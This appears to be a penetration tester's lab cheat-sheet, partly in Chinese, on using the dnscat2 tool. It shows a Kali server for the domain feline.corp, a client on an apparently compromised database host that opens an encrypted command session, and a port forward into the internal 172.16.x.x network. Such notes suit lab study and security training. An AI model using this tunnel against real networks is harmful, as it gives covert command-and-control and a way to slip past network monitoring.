【Tunneling】dnscat2

• 原生 dnscat2
• https://teamssix.com/210608-150224.html
• https://github.com/iagox86/dnscat2

 

• kali tools dnscat2
• https://www.kali.org/tools/dnscat2

安裝

# server
sudo apt install dnscat2
# client
sudo apt install dnscat2-client

使用

server - start

# dnscat2-server {domain}
kali@server:~$ dnscat2-server feline.corp
[sudo] password for kali: 7he_C4t_c0ntro11er

New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = feline.corp]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=d31d6a9e9d5895f42b823043a70fe3d4 feline.corp

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=d31d6a9e9d5895f42b823043a70fe3d4

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2>

client - connect

# dnscat {domain}
database_admin@client:~/dnscat$ ./dnscat feline.corp
./dnscat feline.corp
Creating DNS driver:
 domain = feline.corp
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 127.0.0.53

Encrypted session established! For added security, please verify the server also displays this string:

Gone Nodule Spring Gifts Stirs Foams 

Session established!

server - get connect and linsten

# windows 列出window
dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains = feline.corp [*]
  1 :: command (pgdatabase01) [encrypted, NOT verified] [*]
# -i 1 建立第一個介面
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Gone Nodule Spring Gifts Stirs Foams
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

# 建立本地 4455 轉發 172.16.201.217:4646
command (pgdatabase01) 1> listen 0.0.0.0:4455 172.16.201.217:4646
Listening on 0.0.0.0:4455, sending connections to 172.16.201.217:4646